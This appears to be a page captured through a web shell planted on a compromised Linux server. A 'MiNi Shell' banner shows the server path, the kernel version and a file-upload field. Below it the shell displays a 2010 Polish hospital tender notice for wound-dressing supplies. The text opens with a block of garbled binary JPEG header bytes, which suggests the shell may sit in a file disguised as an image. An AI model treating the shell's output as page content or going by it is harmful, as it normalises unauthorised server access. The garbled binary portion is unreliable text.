JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100309/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100309/65136-N-2010.html

<p class="kh_header"><b>Piekary Śląskie: Dostawa materiałów opatrunkowych dla SP ZOZ w Likwidacji Szpital Miejski w Piekarach Ślaskich</b><br>
<b>Numer ogłoszenia: 65136 - 2010; data zamieszczenia: 09.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Likwidacji Szpital Miejski w Piekarach Śląskich , ul. Szpitalna 11, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3938152, faks 032 3938127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych dla SP ZOZ w Likwidacji Szpital Miejski w Piekarach Ślaskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje materiały opatrunkowe z podziałem na dwa pakiety.
Pakiet 1
1.CHUSTA TRÓJKĄTNA BAWEŁNIANA 	szt	100
2.ELASTYCZNA SIATKA OPATRUNKOWA roz.6 x 10m, szer.5,0-6,5 cm szt	10
3.GAZA OPATRUNKOWA BAWEŁNIANA 17-NITKOWA JAŁOWA 1m x 1m szt 1600
4.GAZA OPATRUNKOWA BAWEŁNIANA 17-NITKOWA NIEJAŁOWA 0,90m x 200m		1 mb	1200
5.KOMPRESY Z GAZY 17 NITKOWEJ JAŁOWE 12 WARSTWOWE 7cm x 7 cm x 3 szt	(2*)	opk	600
6.KOMPRESY Z GAZY 17 NITKOWEJ JAŁOWE 8 WARSTWOWE 7,5cm x 7,5cm x 3 szt	(2*)	opk	3200
7.KOMPRESY Z GAZY 17 NITKOWEJ NIEJAŁOWE 12 WARSTWOWE 
5cm x 5cm x 100 szt		opk	3200
8.KOMPRESY Z GAZY 17 NITKOWEJ NIEJAŁOWE 12 WARSTWOWE                       10cm x 10cm x 100 szt		opk	600
9.KOMPRESY Z GAZY 17 NITKOWEJ NIEJAŁOWE 12 WARSTWOWE                      7,5cm x 7,5cm x 100szt		opk	4400
10.KOMPRESY Z GAZY 17 NITKOWEJ Z NITKĄ RTG NIEJAŁOWE 12 WARSTWOWE 10cm x 10cm x 100szt		opk	500
11.KOMPRESY Z WŁÓKNINY 40g JAŁOWE 4 WARSTWOWE 7,5cm x 7,5cm x 2 szt		opk 100000
12.OPASKA ELASTYCZNA TKANA Z ZAPINKĄ 10cm x 5 m		szt	200
13.OPASKA ELASTYCZNA TKANA Z ZAPINKĄ 15cm x 5m		szt	2400
14.OPASKA PODTRZYMUJĄCA WISKOZOWA 10cm x 4m		szt	10000
15.OPASKA PODTRZYMUJĄCA WISKOZOWA 15cm x 4m		szt	6400
16.OPASKA PODTRZYMUJĄCA WISKOZOWA 5cm x 4m		szt	1800
17.OPATRUNEK INDYWIDUALNY PYŁOSZCZELNY TYPU A 		szt	600
18.PIELUCHOMAJTKI DLA DOROSŁYCH  ROZMIAR L 	(3*)	szt	480
19.PODKŁAD CHŁONNY NIEPRZEMAKALNY 60cm x 90cm		szt	2200
20.PODKŁADY OCHRONNE JEDNORAZOWE BIBUŁOWO-FOLIOWE (ROLKA)                  51cm x 50 cm		opk	260
21.PODKŁADY OCHRONNE JEDNORAZOWE BIBUŁOWO-FOLIOWE (ROLKA)          51cm x 160cm		opk	200
22.SERWETY JAŁOWE WŁÓKNINOWE  45cm x 45cm	(4*)	szt	1600
23.SERWETY NIEJAŁOWE WŁÓKNINOWE  210cm x 160cm	(4*)	szt	8400
24.SERWETY NIEJAŁOWE WŁÓKNINOWE  90cm x 80cm	(4*)	szt	4000
25.SERWETY NIEJAŁOWE WŁÓKNINOWE 160cm x 90cm	(4*)		6000
26.SERWETY OPERACYJNE NIEJAŁOWE Z GAZY 17 NITKOWEJ Z NITKĄ RADIACYJNĄ I TASIEMKĄ 4 WARSTWOWE 45cm x 70cm		szt	6000
27.TUPFERY NIEJAŁOWE (GROSZEK) 12 cm x 12 cm x 100 szt	opk	10
28.WATA CELULOZOWA BIELONA W ARKUSZACH 60cm x 40 cm 	kg	4000
29.WATA CELULOZOWA W ROLKACH 150g		szt	200
30.WATA OPATRUNKOWA BAWEŁNIANA 100g		opk	200
 Pakiet 2
1.OPATRUNEK STERYLNY PRZEZROCZYSTY FOLIOWY Z RAMKĄ do wkłuć centralnych 10cm x12cm		szt.	400
2.OPATRUNEK STERYLNY,SAMOPRZYLEPNY  Z WŁÓKNINY,BIAŁY 7cm x 5cm		szt.	1200
3.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY DO MOCOWANIA KANIUL 8cm x 6cm 		szt.	46000
4.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY,BIAŁY 10cm x 8cm		szt.	8000
5.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY,BIAŁY 15cm x 8cm		szt.	7000
6.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY,BIAŁY 20cm x 10cm		szt.	5000
7.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY,BIAŁY 25cm x 10cm		szt.	6000
8.PLASTER Z OPATRUNKIEM NA TKANINIE 8cm x 1m		szt.	600
9.PRZYLEPIEC NIEJAŁOWY,TKANINOWY Z KLEJEM ZAWIERAJĄCYM TLENEK CYNKU,W KOLORZE SKÓRY  2,5cm x 9,1cm		szt.	1200
10.PRZYLEPIEC NIEJAŁOWY,TKANINOWY Z KLEJEM ZAWIERAJĄCYM TLENEK CYNKU,W KOLORZE SKÓRY  5cm x 9,1cm		szt.	400
11.PRZYLEPIEC NIEJAŁOWY,WŁÓKNINOWY Z HYPOALERGICZNYM KLEJEM Z POLIAKRYLANU,KOLOR BIAŁY 2,5cm x 9,1cm		szt.	1000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.10-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.16-6, 33.14.11.12-8, 33.14.11.19-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że Wykonawca spełnia  warunki udziału w postępowaniu i nie podlega wykluczeniu z postępowania w oparciu o złożone przez Wykonawcę oświadczenie - odpowiednio załącznik 2a lub 2b oraz inne wymagane przez Zamawiającego dokumenty,  oświadczenia, wykazy,   w zakresie przez niego żądanym. 
2.Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i wymaganych dokumentach . Z treści załączonych oświadczeń i dokumentów musi jednoznacznie wynikać, iż Wykonawca spełnia wszystkie wymagane warunki. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania o udzielenie zamówienia w oparciu o przesłanki zawarte w art. 24 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastapi na podstawie złozonego przez Wykonawcę oswiadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastapi na podstawie złozonego przez Wykonawcę oswiadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastapi na podstawie złozonego przez Wykonawcę oswiadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastapi na podstawie złozonego przez Wykonawcę oswiadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W zakresie oferowanych materiałów każdy wykonawca złoży dokumenty potwierdzające, że   są one dopuszczone do obrotu i użytkowania zgodnie z ustawą z dnia 20.04.2004 r. o wyrobach   medycznych ( Dz.U. z 2004 r. Nr 93, poz. 896 ze. zm. )  stosownie do  klasy wyrobu i zasad rejestracji wyrobów medycznych, odpowiednio  wpis/zgłoszenie do rejestru wyrobów  medycznych, deklarację zgodności    producenta, certyfikat CE  . Z załączonych dokumentów winno jednoznaczne wynikać, że dotyczą one  materiału oferowanego przez Wykonawcę.  Na każdym załączonym dokumencie Wykonawca jest  zobowiązany  wpisać numer pakietu oraz pozycję  z formularza cenowego odpowiadającą materiałowi,    którego  dany dokument dotyczy. Brak tego wskazania, będzie traktowany jako niezgodność treści oferty z treścią  SIWZ. W zakresie wyrobów, co do których nie ma zastosowania ustawa o wyrobach medycznych Wykonawca składa stosowne oświadczenie.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe wymagane dokumenty:
a) wypełnioną i podpisaną ofertę na formularzu Oferta  ( Załącznik nr 1 ). 
b) wypełnione i podpisane oświadczenie o spełnieniu przez oferowane wyroby obowiązujących norm i przepisów ( Załącznika nr 3 ), 
c) pełnomocnictwo do reprezentowania Wykonawcy, jeżeli ofertę podpisuje osoba nie       wymieniona w dokumencie określającym status prawny wykonawcy,
d) wypełniony i podpisany  formularz cenowy ( Załącznik Nr  4) .Wykonawcy składają       formularze cenowe odrębnie dla każdego pakietu, do którego przystępują,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku przekaształcenia Szpitala dopuszcza sie zmianę stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41-940 Piekary Śląskie, ul. Szpitalna 11. Specyfikacja w wersji papierowej udostępniana odpłatnie na wniosek Wykonawcy. Cena 20 PLN za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 10:00, miejsce: Sekretariat szpitala..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałow opatrunkowych tj.
1.CHUSTA TRÓJKĄTNA BAWEŁNIANA 		szt	100
2.ELASTYCZNA SIATKA OPATRUNKOWA roz.6 x 10m, szer.5,0-6,5 cm		szt	10
3.GAZA OPATRUNKOWA BAWEŁNIANA 17-NITKOWA JAŁOWA 1m x 1m		szt	1600
4.GAZA OPATRUNKOWA BAWEŁNIANA 17-NITKOWA NIEJAŁOWA 0,90m x 200m		1 mb	1200
5.KOMPRESY Z GAZY 17 NITKOWEJ JAŁOWE 12 WARSTWOWE 7cm x 7 cm x 3 szt	(2*)	opk	600
6.KOMPRESY Z GAZY 17 NITKOWEJ JAŁOWE 8 WARSTWOWE 7,5cm x 7,5cm x 3 szt	(2*)	opk	3200
7.KOMPRESY Z GAZY 17 NITKOWEJ NIEJAŁOWE 12 WARSTWOWE                        5cm x 5cm x 100 szt		opk	3600
8.KOMPRESY Z GAZY 17 NITKOWEJ NIEJAŁOWE 12 WARSTWOWE                       10cm x 10cm x 100 szt		opk	800
9.KOMPRESY Z GAZY 17 NITKOWEJ NIEJAŁOWE 12 WARSTWOWE                      7,5cm x 7,5cm x 100szt		opk	6000
10.KOMPRESY Z GAZY 17 NITKOWEJ Z NITKĄ RTG NIEJAŁOWE 12 WARSTWOWE 10cm x 10cm x 100szt		opk	500
11.KOMPRESY Z WŁÓKNINY 40g JAŁOWE 4 WARSTWOWE 7,5cm x 7,5cm x 2 szt		opk	100000
12.OPASKA ELASTYCZNA TKANA Z ZAPINKĄ 10cm x 5 m		szt	200
13.OPASKA ELASTYCZNA TKANA Z ZAPINKĄ 15cm x 5m		szt	2400
14.OPASKA PODTRZYMUJĄCA WISKOZOWA 10cm x 4m		szt	10000
15.OPASKA PODTRZYMUJĄCA WISKOZOWA 15cm x 4m		szt	7000
16.OPASKA PODTRZYMUJĄCA WISKOZOWA 5cm x 4m		szt	1800
17.OPATRUNEK INDYWIDUALNY PYŁOSZCZELNY TYPU A 		szt	600
18.PIELUCHOMAJTKI DLA DOROSŁYCH  ROZMIAR L 		szt	480
19.PODKŁAD CHŁONNY NIEPRZEMAKALNY 60cm x 90cm		szt	2200
20.PODKŁADY OCHRONNE JEDNORAZOWE BIBUŁOWO-FOLIOWE (ROLKA)                  51cm x 50 cm		opk	260
21.PODKŁADY OCHRONNE JEDNORAZOWE BIBUŁOWO-FOLIOWE (ROLKA)          51cm x 160cm		opk	200
22.SERWETY JAŁOWE WŁÓKNINOWE  45cm x 45cm		szt	1600
23.SERWETY NIEJAŁOWE WŁÓKNINOWE  210cm x 160cm		szt	9000
24.SERWETY NIEJAŁOWE WŁÓKNINOWE  90cm x 80cm		szt	8000
25.SERWETY NIEJAŁOWE WŁÓKNINOWE 160cm x 90cm		szt	6000
26.SERWETY OPERACYJNE NIEJAŁOWE Z GAZY 17 NITKOWEJ Z NITKĄ RADIACYJNĄ I TASIEMKĄ 4 WARSTWOWE 45cm x 70cm		szt	6000
27.TUPFERY NIEJAŁOWE (GROSZEK) 12 cm x 12 cm x 100 szt	opk	10
28.WATA CELULOZOWA BIELONA W ARKUSZACH 60cm x 40 cm 	kg	5000
29.WATA CELULOZOWA W ROLKACH 150g		szt	200
30.WATA OPATRUNKOWA BAWEŁNIANA 100g		opk	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.16-6, 33.14.11.19-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów opatrunkowych tj.
1.OPATRUNEK STERYLNY PRZEZROCZYSTY FOLIOWY Z RAMKĄ do wkłuć centralnych 10cm x12cm		szt.	400
2.OPATRUNEK STERYLNY,SAMOPRZYLEPNY  Z WŁÓKNINY,BIAŁY 7cm x 5cm		szt.	12000
3.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY DO MOCOWANIA KANIUL 8cm x 6cm 		szt.	46000
4.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY,BIAŁY 10cm x 8cm		szt.	8000
5.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY,BIAŁY 15cm x 8cm		szt.	7000
6.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY,BIAŁY 20cm x 10cm		szt.	5000
7.OPATRUNEK STERYLNY,SAMOPRZYLEPNY Z WŁÓKNINY,BIAŁY 25cm x 10cm		szt.	6000
8.PLASTER Z OPATRUNKIEM NA TKANINIE 8cm x 1m		szt.	600
9.PRZYLEPIEC NIEJAŁOWY,TKANINOWY Z KLEJEM ZAWIERAJĄCYM TLENEK CYNKU,W KOLORZE SKÓRY  2,5cm x 9,1cm		szt.	1200
10.PRZYLEPIEC NIEJAŁOWY,TKANINOWY Z KLEJEM ZAWIERAJĄCYM TLENEK CYNKU,W KOLORZE SKÓRY  5cm x 9,1cm		szt.	400
11.PRZYLEPIEC NIEJAŁOWY,WŁÓKNINOWY Z HYPOALERGICZNYM KLEJEM Z POLIAKRYLANU,KOLOR BIAŁY 2,5cm x 9,1cm		szt.	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.10-4, 33.14.11.12-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com